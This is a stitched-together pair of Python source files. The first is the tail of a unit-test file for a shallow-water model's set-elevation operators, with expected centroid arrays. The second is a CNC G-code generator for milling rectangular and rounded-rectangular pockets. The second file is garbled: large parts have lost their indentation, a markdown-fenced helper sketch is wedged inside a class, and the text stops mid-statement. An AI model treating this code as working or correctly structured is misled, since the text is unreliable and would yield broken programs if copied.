        operator = Set_elevation_operator(domain, elevation=elev, polygon=polygon)

        # Apply operator at time t=1.0
        domain.set_time(1.0)
        operator()

        elev_ex = [0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
                   0., 0., 0., 0., 0., 0., 0., 5., 5., 5., 5., 5., 5.,
                   5., 5., 0., 0., 0., 0., 0., 0., 0., 0., 5., 5., 5.,
                   5., 5., 5., 5., 5., 0., 0., 0., 0., 0., 0., 0., 0.,
                   0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.]
        stage_ex = [1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
                    1., 1., 1., 1., 1., 1., 1., 6., 6., 6., 6., 6., 6.,
                    6., 6., 1., 1., 1., 1., 1., 1., 1., 1., 6., 6., 6.,
                    6., 6., 6., 6., 6., 1., 1., 1., 1., 1., 1., 1., 1.,
                    1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.]

        assert num.allclose(domain.quantities['elevation'].centroid_values, elev_ex)
        assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
        assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
        assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)

        # Apply operator at time t=15.0
        domain.set_time(15.0)
        operator()

        elev_ex = [0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
                   0., 0., 0., 0., 0., 0., 0., 7., 7., 7., 7., 7., 7.,
                   7., 7., 0., 0., 0., 0., 0., 0., 0., 0., 7., 7., 7.,
                   7., 7., 7., 7., 7., 0., 0., 0., 0., 0., 0., 0., 0.,
                   0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.]
        stage_ex = [1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
                    1., 1., 1., 1., 1., 1., 1., 8., 8., 8., 8., 8., 8.,
                    8., 8., 1., 1., 1., 1., 1., 1., 1., 1., 8., 8., 8.,
                    8., 8., 8., 8., 8., 1., 1., 1., 1., 1., 1., 1., 1.,
                    1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.]

        assert num.allclose(domain.quantities['elevation'].centroid_values, elev_ex)
        assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
        assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
        assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
    def test_set_circular_elevation_operator_large_function(self):
        from anuga.config import rho_a, rho_w, eta_w
        from math import pi, cos, sin

        length = 2.0
        width = 2.0
        dx = dy = 0.5
        domain = rectangular_cross_domain(int(old_div(length, dx)), int(old_div(width, dy)),
                                          len1=length, len2=width)

        # Flat surface with 1m of water
        domain.set_quantity('elevation', 0.0)
        domain.set_quantity('stage', 1.0)
        domain.set_quantity('friction', 0)

        R = Reflective_boundary(domain)
        domain.set_boundary({'left': R, 'right': R, 'bottom': R, 'top': R})

        def elev(t):
            if t < 10.0:
                return 5.0
            else:
                return 7.0

        operator = Circular_set_elevation_operator(domain, elevation=elev, center=[1.0, 1.0], radius=1.0)

        # Apply operator at time t=1.0
        domain.set_time(1.0)
        operator()

        elev_ex = [0., 0., 5., 5., 5., 5., 5., 5., 5., 5., 5., 5., 0.,
                   5., 5., 0., 5., 5., 5., 5., 5., 5., 5., 5., 5., 5.,
                   5., 5., 5., 5., 5., 5., 5., 5., 5., 5., 5., 5., 5.,
                   5., 5., 5., 5., 5., 5., 5., 5., 5., 5., 0., 0., 5.,
                   5., 5., 5., 5., 5., 5., 5., 5., 5., 5., 0., 0.]
        stage_ex = [1., 1., 6., 6., 6., 6., 6., 6., 6., 6., 6., 6., 1.,
                    6., 6., 1., 6., 6., 6., 6., 6., 6., 6., 6., 6., 6.,
                    6., 6., 6., 6., 6., 6., 6., 6., 6., 6., 6., 6., 6.,
                    6., 6., 6., 6., 6., 6., 6., 6., 6., 6., 1., 1., 6.,
                    6., 6., 6., 6., 6., 6., 6., 6., 6., 6., 1., 1.]

        assert num.allclose(domain.quantities['elevation'].centroid_values, elev_ex)
        assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
        assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
        assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)

        # Apply operator at time t=15.0
        domain.set_time(15.0)
        operator()

        elev_ex = [0., 0., 7., 7., 7., 7., 7., 7., 7., 7., 7., 7., 0.,
                   7., 7., 0., 7., 7., 7., 7., 7., 7., 7., 7., 7., 7.,
                   7., 7., 7., 7., 7., 7., 7., 7., 7., 7., 7., 7., 7.,
                   7., 7., 7., 7., 7., 7., 7., 7., 7., 7., 0., 0., 7.,
                   7., 7., 7., 7., 7., 7., 7., 7., 7., 7., 0., 0.]
        stage_ex = [1., 1., 8., 8., 8., 8., 8., 8., 8., 8., 8., 8., 1.,
                    8., 8., 1., 8., 8., 8., 8., 8., 8., 8., 8., 8., 8.,
                    8., 8., 8., 8., 8., 8., 8., 8., 8., 8., 8., 8., 8.,
                    8., 8., 8., 8., 8., 8., 8., 8., 8., 8., 1., 1., 8.,
                    8., 8., 8., 8., 8., 8., 8., 8., 8., 8., 1., 1.]

        assert num.allclose(domain.quantities['elevation'].centroid_values, elev_ex)
        assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
        assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
        assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
    def test_set_elevation_operator_center_radius_1_5(self):
        from math import pi, cos, sin

        length = 2.0
        width = 2.0
        dx = dy = 0.5
        domain = rectangular_cross_domain(int(old_div(length, dx)), int(old_div(width, dy)),
                                          len1=length, len2=width)
        domain.set_flow_algorithm('1_5')

        # Flat surface with 1m of water
        domain.set_quantity('elevation', 0.0)
        domain.set_quantity('stage', 1.0)
        domain.set_quantity('friction', 0)

        R = Reflective_boundary(domain)
        domain.set_boundary({'left': R, 'right': R, 'bottom': R, 'top': R})

        def elev(t):
            if t < 10.0:
                return 5.0
            else:
                return 7.0

        operator = Set_elevation_operator(domain, elevation=elev, center=[1.0, 1.0], radius=1.0)

        # Apply operator at time t=1.0
        domain.set_time(1.0)
        operator()

        elev_ex = [2.08333333, 2.08333333, 3.75, 3.75, 4.58333333,
                   4.58333333, 5., 5., 4.58333333, 5.,
                   5., 4.58333333, 2.08333333, 3.75, 3.75,
                   2.08333333, 4.58333333, 4.58333333, 5., 5.,
                   5., 5., 5., 5., 5.,
                   5., 5., 5., 4.58333333, 5.,
                   5., 4.58333333, 5., 4.58333333, 4.58333333,
                   5., 5., 5., 5., 5.,
                   5., 5., 5., 5., 5.,
                   5., 4.58333333, 4.58333333, 3.75, 2.08333333,
                   2.08333333, 3.75, 5., 4.58333333, 4.58333333,
                   5., 5., 5., 4.58333333, 4.58333333,
                   3.75, 3.75, 2.08333333, 2.08333333]
        stage_ex = [3.08333333, 3.08333333, 4.75, 4.75, 5.58333333,
                    5.58333333, 6., 6., 5.58333333, 6.,
                    6., 5.58333333, 3.08333333, 4.75, 4.75,
                    3.08333333, 5.58333333, 5.58333333, 6., 6.,
                    6., 6., 6., 6., 6.,
                    6., 6., 6., 5.58333333, 6.,
                    6., 5.58333333, 6., 5.58333333, 5.58333333,
                    6., 6., 6., 6., 6.,
                    6., 6., 6., 6., 6.,
                    6., 5.58333333, 5.58333333, 4.75, 3.08333333,
                    3.08333333, 4.75, 6., 5.58333333, 5.58333333,
                    6., 6., 6., 5.58333333, 5.58333333,
                    4.75, 4.75, 3.08333333, 3.08333333]

        assert num.allclose(domain.quantities['elevation'].centroid_values, elev_ex)
        assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
        assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
        assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)

        # Apply operator at time t=15.0
        domain.set_time(15.0)
        operator()

        elev_ex = [3.64583333, 3.64583333, 5.97916667, 5.97916667, 6.72916667,
                   6.72916667, 7., 7., 6.72916667, 7.,
                   7., 6.72916667, 3.64583333, 5.97916667, 5.97916667,
                   3.64583333, 6.72916667, 6.72916667, 7., 7.,
                   7., 7., 7., 7., 7.,
                   7., 7., 7., 6.72916667, 7.,
                   7., 6.72916667, 7., 6.72916667, 6.72916667,
                   7., 7., 7., 7., 7.,
                   7., 7., 7., 7., 7.,
                   7., 6.72916667, 6.72916667, 5.97916667, 3.64583333,
                   3.64583333, 5.97916667, 7., 6.72916667, 6.72916667,
                   7., 7., 7., 6.72916667, 6.72916667,
                   5.97916667, 5.97916667, 3.64583333, 3.64583333]
        stage_ex = [4.64583333, 4.64583333, 6.97916667, 6.97916667, 7.72916667,
                    7.72916667, 8., 8., 7.72916667, 8.,
                    8., 7.72916667, 4.64583333, 6.97916667, 6.97916667,
                    4.64583333, 7.72916667, 7.72916667, 8., 8.,
                    8., 8., 8., 8., 8.,
                    8., 8., 8., 7.72916667, 8.,
                    8., 7.72916667, 8., 7.72916667, 7.72916667,
                    8., 8., 8., 8., 8.,
                    8., 8., 8., 8., 8.,
                    8., 7.72916667, 7.72916667, 6.97916667, 4.64583333,
                    4.64583333, 6.97916667, 8., 7.72916667, 7.72916667,
                    8., 8., 8., 7.72916667, 7.72916667,
                    6.97916667, 6.97916667, 4.64583333, 4.64583333]

        assert num.allclose(domain.quantities['elevation'].centroid_values, elev_ex)
        assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
        assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
        assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)

        # Reset the elevation over the whole domain
        operator = Set_elevation(domain, elevation=0.0)
        operator()

        assert num.allclose(domain.quantities['elevation'].centroid_values, 0.0)
        assert num.allclose(domain.quantities['stage'].centroid_values, 1.0)
        assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
        assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)

        # Time-dependent elevation on selected triangles
        operator = Set_elevation(domain, elevation=lambda t: t, indices=[0, 1, 3])
        operator()

        elev_ex = [11.25, 10., 5.625, 6.875, 2.5, 3.125, 0.625,
                   0., 0., 0., 0., 0., 0., 0.,
                   0., 0., 1.875, 1.25, 0., 0.625, 0.625,
                   0.625, 0., 0., 0., 0., 0., 0.,
                   0., 0., 0., 0., 0., 0., 0.,
                   0., 0., 0., 0., 0., 0., 0.,
                   0., 0., 0., 0., 0., 0., 0.,
                   0., 0., 0., 0., 0., 0., 0.,
                   0., 0., 0., 0., 0., 0., 0., 0.]
        stage_ex = [12.25, 11., 6.625, 7.875, 3.5, 4.125, 1.625,
                    1., 1., 1., 1., 1., 1., 1.,
                    1., 1., 2.875, 2.25, 1., 1.625, 1.625,
                    1.625, 1., 1., 1., 1., 1., 1.,
                    1., 1., 1., 1., 1., 1., 1.,
                    1., 1., 1., 1., 1., 1., 1.,
                    1., 1., 1., 1., 1., 1., 1.,
                    1., 1., 1., 1., 1., 1., 1.,
                    1., 1., 1., 1., 1., 1., 1., 1.]

        assert num.allclose(domain.quantities['elevation'].centroid_values, elev_ex)
        assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
        assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
        assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
    def test_set_elevation_operator_center_radius_de1(self):
        from math import pi, cos, sin

        length = 2.0
        width = 2.0
        dx = dy = 0.5
        domain = rectangular_cross_domain(int(old_div(length, dx)), int(old_div(width, dy)),
                                          len1=length, len2=width)
        domain.set_flow_algorithm('DE1')

        # Flat surface with 1m of water
        domain.set_quantity('elevation', 0.0)
        domain.set_quantity('stage', 1.0)
        domain.set_quantity('friction', 0)

        R = Reflective_boundary(domain)
        domain.set_boundary({'left': R, 'right': R, 'bottom': R, 'top': R})

        def elev(t):
            if t < 10.0:
                return 5.0
            else:
                return 7.0

        operator = Set_elevation_operator(domain, elevation=elev, center=[1.0, 1.0], radius=1.0)

        # Apply operator at time t=1.0
        domain.set_time(1.0)
        operator()

        elev_ex = [0., 0., 5., 5., 5., 5., 5., 5., 5., 5., 5., 5., 0.,
                   5., 5., 0., 5., 5., 5., 5., 5., 5., 5., 5., 5., 5.,
                   5., 5., 5., 5., 5., 5., 5., 5., 5., 5., 5., 5., 5.,
                   5., 5., 5., 5., 5., 5., 5., 5., 5., 5., 0., 0., 5.,
                   5., 5., 5., 5., 5., 5., 5., 5., 5., 5., 0., 0.]
        stage_ex = [1., 1., 6., 6., 6., 6., 6., 6., 6., 6., 6., 6., 1.,
                    6., 6., 1., 6., 6., 6., 6., 6., 6., 6., 6., 6., 6.,
                    6., 6., 6., 6., 6., 6., 6., 6., 6., 6., 6., 6., 6.,
                    6., 6., 6., 6., 6., 6., 6., 6., 6., 6., 1., 1., 6.,
                    6., 6., 6., 6., 6., 6., 6., 6., 6., 6., 1., 1.]

        assert num.allclose(domain.quantities['elevation'].centroid_values, elev_ex)
        assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
        assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
        assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)

        # Apply operator at time t=15.0
        domain.set_time(15.0)
        operator()

        elev_ex = [0., 0., 7., 7., 7., 7., 7., 7., 7., 7., 7., 7., 0.,
                   7., 7., 0., 7., 7., 7., 7., 7., 7., 7., 7., 7., 7.,
                   7., 7., 7., 7., 7., 7., 7., 7., 7., 7., 7., 7., 7.,
                   7., 7., 7., 7., 7., 7., 7., 7., 7., 7., 0., 0., 7.,
                   7., 7., 7., 7., 7., 7., 7., 7., 7., 7., 0., 0.]
        stage_ex = [1., 1., 8., 8., 8., 8., 8., 8., 8., 8., 8., 8., 1.,
                    8., 8., 1., 8., 8., 8., 8., 8., 8., 8., 8., 8., 8.,
                    8., 8., 8., 8., 8., 8., 8., 8., 8., 8., 8., 8., 8.,
                    8., 8., 8., 8., 8., 8., 8., 8., 8., 8., 1., 1., 8.,
                    8., 8., 8., 8., 8., 8., 8., 8., 8., 8., 1., 1.]

        assert num.allclose(domain.quantities['elevation'].centroid_values, elev_ex)
        assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
        assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
        assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)

        # Reset the elevation over the whole domain
        operator = Set_elevation(domain, elevation=0.0)
        operator()

        assert num.allclose(domain.quantities['elevation'].centroid_values, 0.0)
        assert num.allclose(domain.quantities['stage'].centroid_values, 1.0)
        assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
        assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)

        # Time-dependent elevation on selected triangles
        operator = Set_elevation(domain, elevation=lambda t: t, indices=[0, 1, 3])
        operator()

        elev_ex = [15., 15., 0., 15., 0., 0., 0., 0., 0., 0., 0.,
                   0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
                   0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
                   0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
                   0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
                   0., 0., 0., 0., 0., 0., 0., 0., 0.]
        stage_ex = [16., 16., 1., 16., 1., 1., 1., 1., 1., 1., 1.,
                    1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
                    1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
                    1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
                    1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
                    1., 1., 1., 1., 1., 1., 1., 1., 1.]

        assert num.allclose(domain.quantities['elevation'].centroid_values, elev_ex)
        assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
        assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
        assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
if __name__ == "__main__":
    suite = unittest.makeSuite(Test_set_elevation_operator, 'test')
    runner = unittest.TextTestRunner(verbosity=1)
    runner.run(suite)
# ----------------------------------------------------------------------
# File: gcode_contour_rectangles.py (repo: mrRobot62/gcodebuilder, MIT licence)
# ----------------------------------------------------------------------
import numpy as np
class GCode_Contour_Rectangle(GCode):
""" create a sharp cornerd rectangle """
def __init__ (self, cfg, version="GCode_Contour_Rectange V0.1"):
super().__init__(cfg, version)
@staticmethod
def createRectangle(self, x, y, depth, w, h, f, indent=3, helical=True):
"""create a rectant from position x/y with width and height and a depth for z of f
Args:
x ([type]): [start postion]
y ([type]): [start position]
z ([array]): [start_depth, end_depth, depth_step]
w ([type]): [width ]
h ([type]): [height]
f ([type]): [movement speed]
indent (int, optional): [description]. Defaults to 3.
"""
x = round(float(x),4)
y = round(float(y),4)
z_offset = [0,0,0,0]
z = depth[0]
if depth[1] - depth[0] <= 0.0:
z_offset = [depth[1],depth[1],depth[1],depth[1]]
elif helical and depth[1] > 0.0:
o = (depth[1]-depth[0]) / 4.0
z_offset = np.arange (start=depth[0]+o,stop=depth[1], step=o)
z_offset = np.append(z_offset, depth[1])
self.addGCode(self._cfg.GCODES['lin_move_xyzf'], args={'x':f"{x:.4f}", 'y':f"{(y+h):.4f}", 'z':f"{-z_offset[0]:.4f}", 'feed': f}, indent=indent )
self.addGCode(self._cfg.GCODES['lin_move_xyzf'], args={'x':f"{x+w:.4f}",'y':f"{(y+h):.4f}", 'z':f"{-z_offset[1]:.4f}", 'feed': f}, indent=indent )
self.addGCode(self._cfg.GCODES['lin_move_xyzf'], args={'x':f"{x+w:.4f}",'y':f"{(y):.4f}", 'z':f"{-z_offset[2]:.4f}", 'feed': f}, indent=indent )
self.addGCode(self._cfg.GCODES['lin_move_xyzf'], args={'x':f"{x:.4f}", 'y':f"{(y):.4f}", 'z':f"{-z_offset[3]:.4f}", 'feed': f}, indent=indent )
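# The helical ramp in createRectangle splits the remaining depth of one pass
# evenly over the rectangle's four edges. A minimal standalone sketch of that
# depth schedule (hypothetical helper, not part of the class above):

```python
import numpy as np

def helical_offsets(z_from, z_to):
    """Per-edge target depths for one helical rectangle pass (four edges)."""
    if z_to - z_from <= 0.0:
        # no material left to remove: hold the final depth on all edges
        return [z_to] * 4
    o = (z_to - z_from) / 4.0
    # three intermediate depths, then force the exact end depth on edge four
    offsets = np.append(np.arange(start=z_from + o, stop=z_to, step=o), z_to)
    return [float(v) for v in offsets[:4]]

# One pass from 0 mm to 2 mm deepens by 0.5 mm per edge
print(helical_offsets(0.0, 2.0))  # [0.5, 1.0, 1.5, 2.0]
```

# Slicing to four entries guards against numpy.arange occasionally emitting an
# extra value near the stop bound with floating-point steps.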
    @staticmethod
    def helicalRecHole(self, xy, ab, wh, td, f, depth, contour='on', dir='CW'):
        """Cut a rectangular hole of width w and height h. xy is the lower
        left corner to start from.

        Args:
            xy (float tuple): (x, y)
            ab (float tuple): (distance from 0,0 to cp 2, only used if cp = 0)
            wh (float tuple): (width, height)
            td (float): tool diameter
            f (int): feed/speed
            depth (float tuple): (depth_total, depth_step)
            contour (str, optional): 'on', 'inside' or 'outside'. Defaults to 'on'.
            dir (str, optional): cutting direction. Defaults to 'CW'.
        """
        # Step 1: the starting xy position is always the lower left corner
        if self.cp == '0':
            # cutter is at the machine's 0/0 position
            xy[0] += ab[0]
            xy[1] += ab[1]
        elif self.cp == '1':
            # center of rectangle
            xy[0] -= (wh[0] / 2)
            xy[1] -= (wh[1] / 2)

        dr = self.getDepthStepRangeArray(depth)
        self.addComment("-- helical rectangle start --", leadingBlank=True, endingBlank=True)

        if contour == 'outside':
            # cutting outside: shift out by the tool radius, grow by one diameter
            xy[0] -= (td / 2.0)
            xy[1] -= (td / 2.0)
            wh[0] += td
            wh[1] += td
        elif contour == 'inside':
            # cutting inside: shift in by the tool radius, shrink by one diameter
            xy[0] += (td / 2.0)
            xy[1] += (td / 2.0)
            wh[0] -= td
            wh[1] -= td
        # contour == 'on': cutter centerline follows the outline, no compensation

        self.addGCode(self._cfg.GCODES['spindle_cw'])
        self.addGCode(self._cfg.GCODES['spindle_speed'], args={'speed': self.speed})
        self.addGCode(self._cfg.GCODES['feed_change'], args={'feed': self.rapid_move_xy})

        self.addComment("Start milling", leadingBlank=True, endingBlank=True)

        # Go to start position
        self.addGCode(self._cfg.GCODES['rapid_move_zf'], args={'z': self.z_safety, 'feed': self.rapid_move_z})
        self.addGCode(self._cfg.GCODES['rapid_move_xyf'], args={'x': xy[0], 'y': xy[1], 'feed': self.rapid_move_xy})

        # Start milling
        self.addGCode(self._cfg.GCODES['lin_move_zf'], args={'z': abs(self.z_start), 'feed': self.lin_move_z})

        self.addComment("-- loop --", leadingBlank=True, endingBlank=True)
        last_z = 0
        self.addGCode(self._cfg.GCODES['lin_move_xyzf'], args={'x': xy[0], 'y': xy[1], 'z': -0, 'feed': self.lin_move_xy}, indent=3)
        for z in dr:
            self.addComment(f"-- depth {z} --", leadingBlank=True, endingBlank=True)
            if self.dir == 'CW':
                self.createRectangle(self, x=xy[0], y=xy[1], depth=[last_z, z, self.depth_step], w=wh[0], h=wh[1], f=f, indent=3)
            last_z = z

        self.addComment("-- endloop --", leadingBlank=True, endingBlank=True)
        # self.createRectangle(self, x=xy[0], y=xy[1], depth=[last_z, self.depth_total, self.depth_step], w=wh[0], h=wh[1], f=f, indent=3, helical=False)
def generateGcode(self, data):
"""[summary]
{'pre_gcode': 'G90 G64 G17 G40 G49', 'post_gcode': 'G00 Z10 F100 M2',
'center_point': '1',
'unit': 'mm', 'direction': 'CCW',
'cutter_compensation': 'on', 'depth_step': '0.5', 'depth_total': '33',
'feed_g00_xy': '600', 'feed_g00_z': '400', 'feed_g01_xy': '300', 'feed_g01_z': '15',
'z_start': '3.0', 'z_safety': '15.0',
'tool_dia':'3.0',
'tool_id' : '1',
'speed' : '20000',
---- specific from project -----
'width' : '20',
'height' : '10'
}
Args:
data ([type]): [description]
"""
width = float(data['width'])
height = float(data['height'])
xy = [0,0]
(xy, tool_comp, range) = self.addStandardGCodes(
data,
comments= {
"intro" : {
"text" : 'GCode_Contour_Rectangle. Version {0} - {1}',
"args" : [
"V0.1",
"12-2021"
]
},
"c1" : {
                    "text" : 'Rectangle with a width of {0} and a height of {2}{1}, milling contour {3}, cutting direction {4}',
"args" : [
width,
data['unit'] ,
height,
data['cutter_compensation'],
data['direction']
]
}
}
)
# call static method, note: it's important to send current object as well to method
self.helicalRecHole( self,
xy=xy,
ab=[self.center_offset_x, self.center_offset_y],
wh=[width, height],
td=self.tool_dia,
f=self.lin_move_xy,
depth=[self.depth_total, self.depth_step],
contour=self.contour,
dir=self.dir
)
pass
pass
class GCode_Contour_RoundedRectangle(GCode):
    """ create a rounded-corner rectangle """
    def __init__ (self, cfg, version="GCode_Contour_RoundedRectangle V0.1"):
super().__init__(cfg, version)
@staticmethod
def createRoundedRectangle(self, x, y, depth, w, h, r, f, indent=3, helical=True):
        """create a rounded rectangle from position x/y with the given width, height and depth, moving at feed f
Args:
x ([type]): [start postion]
y ([type]): [start position]
            depth ([array]): [start_depth, end_depth, depth_step]
w ([type]): [width ]
h ([type]): [height]
f ([type]): [movement speed]
indent (int, optional): [description]. Defaults to 3.
"""
x = round(float(x),4)
y = round(float(y),4)
z_offset = [0,0,0,0,0,0,0,0]
z = depth[0]
if depth[1] - depth[0] <= 0.0:
z_offset = [depth[1],depth[1],depth[1],depth[1],depth[1],depth[1],depth[1],depth[1]]
elif helical and depth[1] > 0.0:
o = (depth[1]-depth[0]) / 8.0
z_offset = np.arange (start=depth[0]+o,stop=depth[1], step=o)
z_offset = np.append(z_offset, depth[1])
# start point
self.addGCode(self._cfg.GCODES['lin_move_xyzf'], args={'x':f"{x:.4f}", 'y':f"{y:.4f}",
'z':f"{-z_offset[0]:.4f}", 'feed': f}, indent=indent )
        # 1. edge lower left; positive I<value>
x = w / 2.0
y = h / 2.0 - r
self.addGCode(self._cfg.GCODES['arc_int_cw_xyjz'], args={'x':f"{-x:.4f}", 'y':f"{-y:.4f}",
'j':f"{abs(r):.4f}", 'z':f"{-z_offset[0]:.4f}"}, indent=indent )
# 2. G01
self.addGCode(self._cfg.GCODES['lin_move_xyz'], args={'x':f"{-x:.4f}", 'y':f"{abs(y):.4f}",
'z':f"{-z_offset[1]:.4f}"}, indent=indent )
# 3. G02 edge upper left
x = w / 2.0 - r
y = h / 2.0
self.addGCode(self._cfg.GCODES['arc_int_cw_xyiz'], args={'x':f"{-x:.4f}", 'y':f"{abs(y):.4f}",
'i':f"{abs(r):.4f}", 'z':f"{-z_offset[2]:.4f}"}, indent=indent )
# 4. G01
self.addGCode(self._cfg.GCODES['lin_move_xyz'], args={'x':f"{abs(x):.4f}", 'y':f"{abs(y):.4f}",
'z':f"{-z_offset[3]:.4f}"}, indent=indent )
# 5. G02 edge upper right
x = w / 2.0
y = h / 2.0 - r
self.addGCode(self._cfg.GCODES['arc_int_cw_xyjz'], args={'x':f"{x:.4f}", 'y':f"{y:.4f}",
'j':f"{-r:.4f}", 'z':f"{-z_offset[4]:.4f}"}, indent=indent )
# 6. G01
self.addGCode(self._cfg.GCODES['lin_move_xyz'], args={'x':f"{abs(x):.4f}", 'y':f"{-y:.4f}",
'z':f"{-z_offset[5]:.4f}"}, indent=indent )
# 7. G02 edge lower right
x = w / 2 - r
y = h / 2
self.addGCode(self._cfg.GCODES['arc_int_cw_xyiz'], args={'x':f"{x:.4f}", 'y':f"{-y:.4f}",
'i':f"{-r:.4f}", 'z':f"{-z_offset[6]:.4f}"}, indent=indent )
# 8. G01
self.addGCode(self._cfg.GCODES['lin_move_xyz'], args={'x':f"{-x:.4f}", 'y':f"{-y:.4f}",
'z':f"{-z_offset[7]:.4f}"}, indent=indent )
@staticmethod
def helicalRoundedRecHole(self, xy, ab, wh, td, r, f, depth, contour='on', dir='CW'):
"""
cut a rectangle hole with a width(w) and height(h). XY is the lower left corner to start
Args:
xy (float tuple): (x,y)
ab (float tuple): (distance from 0,0 to cp 2, only used if cp = 0)
wh ([float tuple]): [(width, height)]
td ([float]): [tool diameter]
r ([float]): [edge radius]
f ([int]): [feed/speed]
cp ([int]): [center point (0,1,2)]
depth (float tuple) : (depth_total, depth_step)
contour (str, optional): [description]. Defaults to 'on'.
dir (str, optional): [description]. Defaults to 'CW'.
"""
        # Step 1: starting xy position is always the lower left corner
#
# Math
# a = width, b=height, r=radius
# Example a=10, b=6, r=2.8)
# ( x= b/2-r => x = 6 / 2 = 3 - 2.8 = 0.2 )
# ( G01 X0.2 Y....)
# ( y= a/2-r => y = 10 / 2 = 5 - 2.8 = 2.2 )
# G02 X0.2 Y2.2
if self.cp == '0' :
# cutter is on machines 0/0 position
xy[0] += ab[0]
xy[1] += ab[1]
elif self.cp == '1':
# center of rectangle
xy[0] -= (wh[0] / 2) - r
xy[1] -= (wh[1] / 2)
dr = self.getDepthStepRangeArray(depth)
comment = f"-- helical rounded rectangle start --"
last_z = 0
self.addComment(comment, leadingBlank=True, endingBlank=True)
if contour == 'outside':
xy[0] -= (td / 2.0)
xy[1] -= (td / 2.0)
wh[0] += td # if we cut outside, width of rectangle is tool_diameter wider
wh[1] += td # if we cut outside, height of rectangle is tool_diameter wider
pass
elif contour == 'inside':
xy[0] += (td / 2.0) # move
xy[1] += (td / 2.0)
            wh[0] -= td # if we cut inside, width of rectangle is tool_diameter smaller
            wh[1] -= td # if we cut inside, height of rectangle is tool_diameter smaller
pass
else:
# 'on'
pass
pass
#
# (loop)
self.addGCode(self._cfg.GCODES['spindle_cw'])
self.addGCode(self._cfg.GCODES['spindle_speed'],args={'speed':self.speed })
self.addGCode(self._cfg.GCODES['feed_change'],args={'feed':self.rapid_move_xy })
comment = f"Start milling"
self.addComment(comment, leadingBlank=True, endingBlank=True)
#
# Go to start position
self.addGCode(self._cfg.GCODES['rapid_move_zf'], args={'z':self.z_safety, 'feed':self.rapid_move_z})
self.addGCode(self._cfg.GCODES['rapid_move_xyf'],args={'x':xy[0], 'y':xy[1], 'feed':self.rapid_move_xy})
#
# Start milling
self.addGCode(self._cfg.GCODES['lin_move_zf'],args={'z':abs(self.z_start), 'feed':self.lin_move_z})
comment = f"-- loop --"
self.addComment(comment, leadingBlank=True, endingBlank=True)
last_z = 0
for z in dr:
comment = f"-- depth {z} --"
self.addComment(comment, leadingBlank=True, endingBlank=True)
if self.dir == 'CW':
self.createRoundedRectangle(self, x=xy[0], y=xy[1], depth=[last_z, z, self.depth_step], w=wh[0], h=wh[1], r=r, f=f, indent=3)
last_z = z
pass
comment = f"-- endloop --"
self.addComment(comment, leadingBlank=True, endingBlank=True)
#self.createRectangle(self, x=xy[0], y=xy[1], depth=[last_z,self.depth_total, self.depth_step], w=wh[0], h=wh[1], f=f, indent=3, helical=False)
def generateGcode(self, data):
"""[summary]
{'pre_gcode': 'G90 G64 G17 G40 G49', 'post_gcode': 'G00 Z10 F100 M2',
'center_point': '1',
'unit': 'mm', 'direction': 'CCW',
'cutter_compensation': 'on', 'depth_step': '0.5', 'depth_total': '33',
'feed_g00_xy': '600', 'feed_g00_z': '400', 'feed_g01_xy': '300', 'feed_g01_z': '15',
'z_start': '3.0', 'z_safety': '15.0',
'tool_dia':'3.0',
'tool_id' : '1',
'speed' : '20000',
---- specific from project -----
'width' : '20',
'height' : '10'
}
Args:
data ([type]): [description]
"""
width = float(data['width'])
height = float(data['height'])
radius = float(data['radius'])
xy = [0,0]
(xy, tool_comp, range) = self.addStandardGCodes(
data,
comments= {
"intro" : {
"text" : 'GCode_Contour_RoundedRectangle. Version {0} - {1}',
"args" : [
"V0.1",
"12-2021"
]
},
"c1" : {
"text" : 'Rounded rectangle with a width of {0} and a height of {2}{1} and edge radius {3}',
